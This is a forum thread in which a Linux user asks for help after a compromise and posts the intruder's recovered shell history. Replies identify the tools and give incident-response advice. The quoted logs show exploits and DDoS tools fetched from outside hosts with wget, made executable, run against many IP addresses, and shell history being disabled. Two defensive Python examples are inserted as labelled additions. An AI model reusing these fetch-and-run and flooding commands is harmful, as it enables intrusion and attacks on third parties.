LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Old 03-23-2004, 12:30 AM   #1
carrion
LQ Newbie
 
Registered: Mar 2004
Posts: 1

Rep: Reputation: 0
Hacker attack


Well, I was hacked (first time). It was totally my fault for allowing a certain user to have such a horrible password. I don't know why I allowed it, but it is now a totally randomly generated pass, so I guess hindsight and all.

I have been searching through the logs and found a series of IP addresses that were trying to log in to FTP with anonymous, but all the IP addresses from last and from the logs dealing with login are accounted for. I can't find any sign of login from a hacker.

When he/she (henceforth it) gained access, it downloaded several files, chmoded them executable and then ran them with various params. I found a .bash_history in the /tmp dir that contained the following (I distorted the URLs to get by the filter here):
Quote:
w
cd /tmp
uname -a
wget (www).irclogged.hpg.com.br/xp
wget (www).irclogged.hpg.com.br/xp
chmod +x xp
./xp
cd /tmp
ps x
wget (http)://members.lycos.co.uk/ownznow/o/po
chmod +x po
./po
./po
./po
./po
./po
rm -rf po
ls
ps x
wget (www).irclogged.hpg.com.br/p
chmod +x p
./p;
./p; ./p; ./p; ./p; ./p; ./p
ps x
kill -9 11590
kill -9 11515
ps x
ls
w
ps x
exit
cd /tmp
ls
rm -rf *
cd /var/tmp
ls
./pt
ls -a
cd ...
ls
rm -rf *
wget (www).nene.nu/f3
chmod +x f3
./f3 200.171.161.4 65335 20
./f3 200.138.145.64 65335 300
./f3 200.138.145.64 65335 30
./f3 200.138.145.64 65335 30
ls
wget (www).ircentrevistas.hpg.com.br/pass/hl
wget (www).ircentrevistas.hpg.com.br/pass/hl
chmod +x hl
./hl
./hl -h 200.171.161.4 -t 1
w
./hl -h 66.143.96.60 -t 0
./hl -h 65.16.221.235 -t 0
./hl -h 66.90.73.195 -t 0
telnet 66.90.73.195 4561
ls
./hl -h 12.15.89.7 -t 0 -p 27025
./hl -h 69.56.208.42 -t 0
./hl -h 66.235.186.52 -t 0
./hl -h 66.98.162.91 -t 0
./hl -h 65.125.234.90 -t 0
./hl -h 66.98.159.163 -t 0
./hl -h 217.160.247.138 -t 0
./hl -h 69.22.254.131 -t 0
./hl -h 65.105.124.172 -t 0
./hl -h 69.56.163.197 -t 0
./hl -h 12.96.166.226 -t 0
./hl -h 69.41.249.124 -t 0
./hl -h 69.56.128.102 -t 0
./hl -h 66.199.227.100 -t 0
./hl -h 204.157.1.63 -t 0
./hl -h 69.93.96.150 -t 0
ps x
ls
ps x
rm -rf hl
exit
cd /var/tmp/...
ls
wget (www).ircentrevistas.hpg.com.br/pass/hl
chmod +x hl
./hl -h 193.19.164.94 -t 0
rm -rf hl
exit
w
cd /var/tmp/...
w
ls
./f3 200.164.61.132 65335 600 &
ps x
killall -9 hlds
killall -9 hlds_run
ps x
killall -9 f3
ps x
./f3 200.164.61.132 01 600 &
ps x
netstat
ps x
ps x
ps x
kill -9 11796
w
ps x
exit
w
uname -a
exit
w
who
netstat
cd /var/tmp/...
ls
./f3 200.242.124.194 6667 800 &
w
w
ls
ps x
w
w
./f3 62.25.176.33 65335 300
w./f3 62.25.176.33 65335 300
./f3 62.25.214.19 65335 300
w
exit
I also looked in the .bash_history in the users home and it contained:
Quote:
unset histfile
cd /var/tmp
cd /tmp
ls -al
cd .bash_history
ls
unset histfile
cd /var/tmp
ls
mkdir .bash_histori
cd .bash_histori
ls
pwd
unset histfile
wget xmirc.host.sk/xpl.txt
ls
rm xpl.txt
ls
cd ..
ls
wget xmirc.host.sk/xpl.txt
chmod +xs xpl.txt
./xpl.txt
./xpl.txt
./xpl.txt
./xpl.txt
./xpl.txt
./xpl.txt
./xpl.txt
uname -a
host mercury.yourlasthost.com
ls
rm xpl.txt
ls -al
wget members.lycos.co.uk/spakowsk/doze4
chmod +xs doze4
./doze4
./doze4 200.227.235.196 0 200.227.235.156
./doze4 200.96.212.37 0 200.96.212.156
./doze4 200.193.210.21 0 200.193.210.156
ls
rm doze4
ls
w
finger root
cd /
w
uptime
unset histfile
exit
unset histfile
w
cd /var/tmp
ls
ls -al
cd .bash_histori
ls
cd ..
ls
wget members.lycos.co.uk/doze4
wget members.lycos.co.uk/spakowsk/doze4
chmod +xs doze4
./doze4 200.185.45.23 0 200.185.45.156
./doze4 200.218.180.23 0 200.218.180.156
./doze4 200.218.180.2 0 200.218.180.156
./doze4 200.185.6.123 0 200.185.6.156
w
cd /
exit
I found doze4, f3, and mremap_pte and removed their executable permissions, moved them and changed their owner. I didn't want to delete them until I knew what they did. This brings me to my main question, what did this hacker do? I see a lot of IRC related links, and a couple of commands for hlds (I do run game servers on this box). I don't see anything strange running, and there are no new cronjobs, so I'm not sure if it really did anything long term. It did not compromise root, so there is some good luck. I tried downloading those files on a windows box, but it is just garbled compiled code (I think) so I can't really tell what they do. Any help is appreciated.
 
Old 03-23-2004, 03:14 AM   #2
phek
Member
 
Registered: Jul 2001
Location: California, US
Distribution: Slackware
Posts: 196

Rep: Reputation: 30
Well, there's no real way to tell what he did without asking him, and you can't be sure he didn't compromise root (though by seeing how sloppy he's been, I would doubt you wouldn't notice). As far as what those programs do, your best bet is to run the program strings on them ( strings <filename> ); hopefully it'll give you some hints as to what they are or maybe the name of them. And just because you don't see some process running doesn't mean it's not actually running; they could have replaced ps with some hacked version. Your best bet is to write some sort of script/program to go through all the PIDs in /proc and figure out what your machine is running from there (though that's still not a definite answer).
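An added example (not code from the thread) of the /proc cross-check phek suggests: take the PID list the kernel exposes in /proc, take the PID list a possibly trojaned ps reports, and describe every PID that only the kernel knows about. It assumes a Linux /proc layout and a ps that accepts the POSIX `-e -o pid=` options.

```python
"""Cross-check the PIDs the kernel exposes in /proc against what ps reports.

A replaced ps can hide an intruder's processes, but the /proc/<pid>
directories come straight from the kernel, so a PID present in /proc and
absent from ps output deserves a closer look. Run as root on the isolated box.
"""
import os
import subprocess


def pids_from_proc(proc="/proc"):
    """Numeric directory names under /proc are live PIDs (the kernel's view)."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}


def parse_ps_pids(ps_output):
    """Turn the output of `ps -e -o pid=` into a set of PIDs (the ps view)."""
    return {int(tok) for tok in ps_output.split() if tok.isdigit()}


def pids_from_ps():
    out = subprocess.run(["ps", "-e", "-o", "pid="], capture_output=True,
                         text=True, check=True).stdout
    return parse_ps_pids(out)


def hidden_pids(proc_pids, ps_pids):
    """PIDs the kernel knows about that ps did not list, sorted ascending."""
    return sorted(proc_pids - ps_pids)


def describe(pid, proc="/proc"):
    """Describe a PID from /proc directly, without trusting ps or ls."""
    try:
        with open(f"{proc}/{pid}/cmdline", "rb") as fh:
            cmd = fh.read().replace(b"\0", b" ").decode("utf-8", "replace")
        exe = os.readlink(f"{proc}/{pid}/exe")  # ends in "(deleted)" if the binary was rm'ed
    except OSError as err:
        return f"{pid}: unreadable ({err})"
    return f"{pid}: exe={exe} cmdline={cmd.strip()!r}"


def main():
    # ps first, then /proc: a process started in between shows up only in
    # /proc, so every suspect is re-checked against a fresh ps run below.
    ps_pids = pids_from_ps()
    suspects = hidden_pids(pids_from_proc(), ps_pids)
    confirmed = [p for p in suspects
                 if os.path.isdir(f"/proc/{p}") and p not in pids_from_ps()]
    for pid in confirmed:
        print("present in /proc but not reported by ps:", describe(pid))
    return confirmed
```

Call `main()` to run the check; an empty list only means ps and the kernel agree, not that the box is clean, since a kernel-level rootkit can hide /proc entries too.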
 
Old 03-23-2004, 06:55 AM   #3
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,374
Blog Entries: 54

Rep: Reputation: 2872
Quote:
Well, I was hacked (first time). It was totally my fault for allowing a certain user to have such a horrible password.
Ouch. Please check out the LQ FAQ: Security references under Compromise, breach of security, detection and at least check out the Intruder Detection Checklist (CERT): http://www.cert.org/tech_tips/intrud...checklist.html if you need a checklist for the procedure.

In a nutshell, when a box was (suspected) compromised you need to:
- isolate it from the rest of the network,
- check users, processes and filesystem integrity (note: with rootkits installed, results may not indicate anything),
- drop to runlevel 1 and repeat step 2,
- power down the box, notify users, check boxen in your vicinity and decide how to handle the compromise. If you need reference for future forensics, add the HDs to another box, boot something like Knoppix, FIRE, PSK or the distro on the other box, mount the HDs read-only and "dd" the whole HDs to image. Else you're looking at the three R's: repartition, reformat, reinstall from scratch.
Please don't use backup & restore procedures unless you have external and untainted means to verify the integrity of the backup contents. Please do not back up binaries.


Quote:
I don't know why I allowed it,
With all due respect (and I suppose I don't have to explain your own actions to you, nor do I want to sound like a teacher), but usually this is due to plain ol' laziness. Someone needs something RSN and the admin decides it's not worth it to go through the motions and takes a shortcut... I've seen it happen in RL too often. Best way is to make some rules and (make everyone) adhere to them.


Quote:
I have been searching through the logs and found a series of IP addresses that were trying to log in to FTP with anonymous, but all the IP addresses from last and from the logs dealing with login are accounted for. I can't find any sign of login from a hacker.
Using an exploit doesn't require the intruder to write login info; in short, she just makes a vulnerable application Do Things for her.


Quote:
I found doze4, f3, and mremap_pte and removed their executable permissions, moved them and changed their owner.
Excellent. I hope you first made sure you enabled verbose logging for about everything, users were denied logging in and services were shut down?


Quote:
I didn't want to delete them until I knew what they did. This brings me to my main question, what did this hacker do?
As far as the binaries are concerned, "doze4" and "f3" are IP spoofing tools, "hl" is a multi-platform Halflife server exploit, "p" and "xp" are kernel ptrace vulnerability exploits, and "po" is AFAIK a kernel mremap vulnerability exploit. The "mremap_pte" probably is the plain Jane mremap Proof of Concept code for the second Linux kernel mremap vulnerability as released on Bugtraq/Full Disclosure a while ago. Without a report of your Linux box SW specs and anomalies from your system/app logs there isn't much to say about the point of entry, except you hinted at FTP. Please post the server's specs. Halflife servers also had a vulnerability or some vulnerabilities patched at the end of last year.


Quote:
I see a lot of IRC related links, and a couple of commands for hlds (I do run game servers on this box). I don't see anything strange running, and there are no new cronjobs, so I'm not sure if it really did anything long term.
See top of reply. Don't make yourself comfortable just yet.


Quote:
It did not compromise root, so there is some good luck.
Yes, and pigs *can* fly :-]


Quote:
I tried downloading those files on a windows box, but it is just garbled compiled code (I think) so I can't really tell what they do. Any help is appreciated.

Could start with
Code:
# Identify each binary, dump its printable strings and ELF headers into
# per-file reports (stdout and stderr both captured) for offline review.
for i in doze4 f3 hl p po xp; do
  file "${i}" > "file.${i}" 2>&1
  strings -n 4 "${i}" > "strings.${i}" 2>&1
  readelf -a "${i}" > "elf.${i}" 2>&1
done
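An added example (not from unSpawn or the thread) for the "dd the whole HDs to image" step in the checklist above: it copies a disk block by block, zero-fills blocks that fail to read the way `dd conv=noerror,sync` does, and writes a SHA-256 sidecar so the image can be verified later. It assumes the source (a file or block device) is readable by Python from a clean boot environment.

```python
"""Forensic disk image with an integrity hash (stand-in for "dd the HD to image").

Reads block by block, zero-fills unreadable blocks like dd conv=noerror,sync,
and writes a SHA-256 sidecar. Run from a clean boot with the disk unmounted.
"""
import hashlib
import os
import tempfile

BLOCK = 1024 * 1024  # 1 MiB reads; one unreadable sector costs one block


def image_device(src, dst, block=BLOCK):
    """Copy src to dst; return (bytes_written, bad_blocks, sha256 hex)."""
    digest, bad, pos = hashlib.sha256(), 0, 0
    with open(src, "rb", buffering=0) as fin, open(dst, "wb") as fout:
        total = fin.seek(0, os.SEEK_END)  # size of a file or block device
        while pos < total:
            want = min(block, total - pos)
            fin.seek(pos)
            try:
                buf = fin.read(want)
            except OSError:  # noerror: skip the bad block instead of aborting
                buf, bad = b"", bad + 1
            buf = buf.ljust(want, b"\0")  # sync: keep image offsets aligned
            fout.write(buf)
            digest.update(buf)
            pos += want
    sha = digest.hexdigest()
    with open(dst + ".sha256", "w") as fh:  # sidecar for chain of custody
        fh.write(f"{sha}  {os.path.basename(dst)}\n")
    return pos, bad, sha


def sha256_of_file(path, block=BLOCK):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(block), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_image(dst):
    # Re-hash the image and compare with its sidecar; True if intact.
    with open(dst + ".sha256") as fh:
        return sha256_of_file(dst) == fh.read().split()[0]


def selftest():
    """Image a constructed 3 MiB + 1 byte file; return (size, bad, verified)."""
    with tempfile.TemporaryDirectory() as tmp:
        src, dst = os.path.join(tmp, "sda"), os.path.join(tmp, "sda.img")
        with open(src, "wb") as fh:
            fh.write(os.urandom(3 * BLOCK + 1))
        size, bad, sha = image_device(src, dst)
        return size, bad, verify_image(dst) and sha == sha256_of_file(src)
```

For a real disk, call `image_device("/dev/sdX", "/mnt/evidence/sdX.img")` and keep the sidecar with the image; a nonzero bad-block count means the image has zero-filled gaps and should be noted in the case record.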
 
Old 04-27-2004, 08:17 AM   #4
spakowsk
LQ Newbie
 
Registered: Apr 2004
Posts: 1

Rep: Reputation: 0
doze4

I am the owner of the FTP where the DDoS "doze4" was hosted and I know the vulnerability of your system. Information: spakowsk@linuxmail.org. I answer e-mails only in Portuguese.
 
Old 04-27-2004, 12:23 PM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,374
Blog Entries: 54

Rep: Reputation: 2872
Spakowsk, please write in English, thank you.
 
Old 04-28-2004, 07:32 AM   #6
dominant
Member
 
Registered: Jan 2004
Posts: 409

Rep: Reputation: 30
Please, write in English!
 
Old 08-19-2004, 02:27 PM   #7
rash
LQ Newbie
 
Registered: Aug 2004
Location: Brazil
Distribution: Debian
Posts: 4

Rep: Reputation: 0
The bug was in the PHP of your site. Turn on safe_mode in your php.ini config file, then restart Apache. Locate any suspicious .php files on your web server that have functions like system, and search for the string wget in your Apache logs to find the invader's IP.


Upgrade the version of your kernel; some versions of kernel 2.4 have a bug that allows exploiting the kernel and gaining root access. Verify the open ports on your system and whether there are suspicious executables in ps.

Regards.

Last edited by rash; 08-19-2004 at 02:30 PM.
 
Old 08-19-2004, 09:37 PM   #8
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Quote:
Originally posted by rash
The bug was in the PHP of your site. Turn on safe_mode in your php.ini config file, then restart Apache. Locate any suspicious .php files on your web server that have functions like system, and search for the string wget in your Apache logs to find the invader's IP.


Upgrade the version of your kernel; some versions of kernel 2.4 have a bug that allows exploiting the kernel and gaining root access. Verify the open ports on your system and whether there are suspicious executables in ps.

Regards.
Could you explain how you know that a PHP bug was exploited? I don't even see a mention of PHP in any of the above posts.
 
Old 08-20-2004, 09:14 AM   #9
rash
LQ Newbie
 
Registered: Aug 2004
Location: Brazil
Distribution: Debian
Posts: 4

Rep: Reputation: 0
You went through the same problem as me.
I'm neurotic about security and my web server was mass defaced, and the traffic went way up, with the same programs as you.
The only breach that I have found is in PHP.
Don't worry, I didn't hack you. I'm helping.

Regards.
 
Old 08-20-2004, 12:49 PM   #10
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Quote:
with the same programs as you
The majority of those files are common cracking tools that are freely available for download from numerous places. You'll actually find them on cracked systems quite frequently, despite the systems being attacked by different people using different exploits to gain access. I think just finding those files on a system isn't a guarantee that it was the same crackers or that it was exploited the same way.

Quote:
my web server was mass defaced, and the traffic went way up
I hope that you've taken it offline, done a format and re-installed the OS.

Quote:
Don't worry, I didn't hack you
Well, that's good to know.
 
Old 08-23-2004, 10:44 AM   #11
rash
LQ Newbie
 
Registered: Aug 2004
Location: Brazil
Distribution: Debian
Posts: 4

Rep: Reputation: 0
Hi Capt_Caveman! hehe


Of course I did the things you mentioned. But I followed the path of the attacker. Luckily the "hacker" didn't delete the trace of the path.
And I looked at the programs he put on my server, including the code of some of them. Fortunately the script kiddie put the solution in my hands.
 
Old 08-23-2004, 02:03 PM   #12
slackie1000
Senior Member
 
Registered: Dec 2003
Location: Brasil
Distribution: Arch
Posts: 1,037

Rep: Reputation: 45
Re: doze4

Quote:
Originally posted by spakowsk
I am the owner of the FTP where the DDoS "doze4" was hosted and I know the vulnerability of your system. Information: spakowsk@linuxmail.org. I answer e-mails only in Portuguese.
now from carrion post...

Quote:

wget members.lycos.co.uk/spakowsk/doze4
chmod +xs doze4
./doze4
./doze4 200.227.235.196 0 200.227.235.156
./doze4 200.96.212.37 0 200.96.212.156
./doze4 200.193.210.21 0 200.193.210.156
ls
I am not sure if there is something connected....
He says that he is the owner of the doze4 FTP server and that he knows the vulnerability of carrion's system...
Just to help with the language spam..
spakowsk, you should not do that...

regards

slackie1000
 